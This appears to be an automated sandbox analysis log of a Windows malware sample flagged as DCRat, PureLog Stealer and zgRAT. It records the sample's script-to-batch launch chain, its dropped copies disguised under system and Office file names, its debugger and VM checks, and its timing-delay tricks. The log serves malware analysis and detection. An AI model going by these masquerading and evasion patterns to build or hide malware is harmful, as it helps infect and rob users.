Source: C:\Users\user\PuhmblZdAcSNmlRDfzjrgW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\PuhmblZdAcSNmlRDfzjrgW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\PuhmblZdAcSNmlRDfzjrgW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\PuhmblZdAcSNmlRDfzjrgW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Memory allocated: C20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Memory allocated: 1A940000 memory reserve \| memory write watch	Jump to behavior
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Memory allocated: D30000 memory reserve \| memory write watch
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Memory allocated: 1A7A0000 memory reserve \| memory write watch
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Memory allocated: 2A90000 memory reserve \| memory write watch
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Memory allocated: 1AB10000 memory reserve \| memory write watch
Source: C:\Users\user\PuhmblZdAcSNmlRDfzjrgW.exe	Memory allocated: 2A10000 memory reserve \| memory write watch
Source: C:\Users\user\PuhmblZdAcSNmlRDfzjrgW.exe	Memory allocated: 1ABD0000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\WmiPrvSE.exe	Memory allocated: 27B0000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\WmiPrvSE.exe	Memory allocated: 1A9E0000 memory reserve \| memory write watch

Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Thread delayed: delay time: 922337203685477
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\PuhmblZdAcSNmlRDfzjrgW.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\WmiPrvSE.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\PuTbcYNO.log	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exe	Jump to dropped file
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\zSWmQQDs.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\sBmPHITf.log	Jump to dropped file
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\gBkGwLsc.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\BfvFrBjN.log	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Jump to dropped file
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\iLGHwdYd.log	Jump to dropped file
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\GQKmsfxg.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\ZkzjoDJQ.log	Jump to dropped file
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\oncOKnjP.log	Jump to dropped file
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\XXbRMRdv.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\PdatkTco.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\RGruEKtj.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\oOURfLEr.log	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\LNOVbeou.log	Jump to dropped file

Source: C:\Users\user\Desktop\DC86.exe

Evasive API call chain: GetLocalTime,DecisionNodes

graph_0-23797

Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe TID: 6932	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe TID: 5268	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe TID: 5032	Thread sleep time: -922337203685477s >= -30000s
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe TID: 4412	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\PuhmblZdAcSNmlRDfzjrgW.exe TID: 6312	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe TID: 6408	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\WmiPrvSE.exe TID: 4980	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\PuhmblZdAcSNmlRDfzjrgW.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\WmiPrvSE.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\DC86.exe	Code function: 0_2_009EA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	0_2_009EA69B
Source: C:\Users\user\Desktop\DC86.exe	Code function: 0_2_009FC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	0_2_009FC220
Source: C:\Users\user\Desktop\DC86.exe	Code function: 0_2_00A0B348 FindFirstFileExA,	0_2_00A0B348

Source: C:\Users\user\Desktop\DC86.exe

Code function: 0_2_009FE6A3 VirtualQuery,GetSystemInfo,

0_2_009FE6A3

Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Thread delayed: delay time: 922337203685477
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\PuhmblZdAcSNmlRDfzjrgW.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\WmiPrvSE.exe	Thread delayed: delay time: 922337203685477

Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior

Source: hyperProviderbrokermonitorNet.exe, 00000005.00000002.2313260105.0000000000A76000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: hyperProviderbrokermonitorNet.exe, 00000005.00000002.2321491482.000000001B268000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: wscript.exe, 00000002.00000003.2232293315.00000000028FF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: wscript.exe, 00000002.00000003.2232293315.00000000028FF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Prod_VMware_SATA_CD00#4&
Source: wscript.exe, 00000002.00000003.2232293315.00000000028FF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}w
Source: w32tm.exe, 00000025.00000002.2364712845.0000019C01B38000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\DC86.exe

API call chain: ExitProcess graph end node

graph_0-23988

Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\DC86.exe

Code function: 0_2_009FF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_009FF838

Source: C:\Users\user\Desktop\DC86.exe

Code function: 0_2_00A07DEE mov eax, dword ptr fs:[00000030h]

0_2_00A07DEE

Source: C:\Users\user\Desktop\DC86.exe

Code function: 0_2_00A0C030 GetProcessHeap,

0_2_00A0C030

Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Process token adjusted: Debug
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Process token adjusted: Debug
Source: C:\Users\user\PuhmblZdAcSNmlRDfzjrgW.exe	Process token adjusted: Debug
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	Process token adjusted: Debug
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\WmiPrvSE.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\DC86.exe	Code function: 0_2_009FF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_009FF838
Source: C:\Users\user\Desktop\DC86.exe	Code function: 0_2_009FF9D5 SetUnhandledExceptionFilter,	0_2_009FF9D5
Source: C:\Users\user\Desktop\DC86.exe	Code function: 0_2_009FFBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_009FFBCA
Source: C:\Users\user\Desktop\DC86.exe	Code function: 0_2_00A08EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00A08EBD

Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\DC86.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\hyperIntoBroker\vN1MMUTrCtC1FtSWQe4vLUvQugg9bTGuni3V.vbe"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\hyperIntoBroker\7ZVJJhRLWkC.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe "C:\hyperIntoBroker/hyperProviderbrokermonitorNet.exe"	Jump to behavior
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gvn4blmg\gvn4blmg.cmdline"	Jump to behavior
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\obippivd\obippivd.cmdline"	Jump to behavior
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\JWcAfTbAe8.bat"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3377.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC54DAB3F1F89841D48E3F80BA35A395CE.TMP"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES355B.tmp" "c:\Windows\System32\CSCBF0D9C89CA2D49349EF95B69138A8B32.TMP"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\WmiPrvSE.exe "C:\Program Files (x86)\mozilla maintenance service\logs\WmiPrvSE.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe "C:\Program Files (x86)\microsoft office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe"

Source: C:\Users\user\Desktop\DC86.exe

Code function: 0_2_009FF654 cpuid

0_2_009FF654

Source: C:\Users\user\Desktop\DC86.exe

Code function: GetLocaleInfoW,GetNumberFormatW,

0_2_009FAF0F

Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Queries volume information: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe VolumeInformation	Jump to behavior
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	Queries volume information: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Queries volume information: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe VolumeInformation
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Queries volume information: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe VolumeInformation
Source: C:\Users\user\PuhmblZdAcSNmlRDfzjrgW.exe	Queries volume information: C:\Users\user\PuhmblZdAcSNmlRDfzjrgW.exe VolumeInformation
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	Queries volume information: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe VolumeInformation
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\WmiPrvSE.exe	Queries volume information: C:\Program Files (x86)\Mozilla Maintenance Service\logs\WmiPrvSE.exe VolumeInformation

Source: C:\Users\user\Desktop\DC86.exe

Code function: 0_2_009FDF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,

0_2_009FDF1E

Source: C:\Users\user\Desktop\DC86.exe

Code function: 0_2_009EB146 GetVersionExW,

0_2_009EB146

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected DCRat

Source: Yara match	File source: 00000005.00000002.2319266485.00000000129EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: hyperProviderbrokermonitorNet.exe PID: 1416, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: DC86.exe, type: SAMPLE
Source: Yara match	File source: 0.3.DC86.exe.6c2a701.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.DC86.exe.7535701.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.hyperProviderbrokermonitorNet.exe.410000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.DC86.exe.7535701.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.DC86.exe.6c2a701.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.2110245096.00000000074E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.2240119173.0000000000412000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2109455110.0000000006BDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\WmiPrvSE.exe, type: DROPPED
Source: Yara match	File source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: DC86.exe, type: SAMPLE
Source: Yara match	File source: 0.3.DC86.exe.6c2a701.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.DC86.exe.7535701.1.unpack, type: UNPACKEDPE
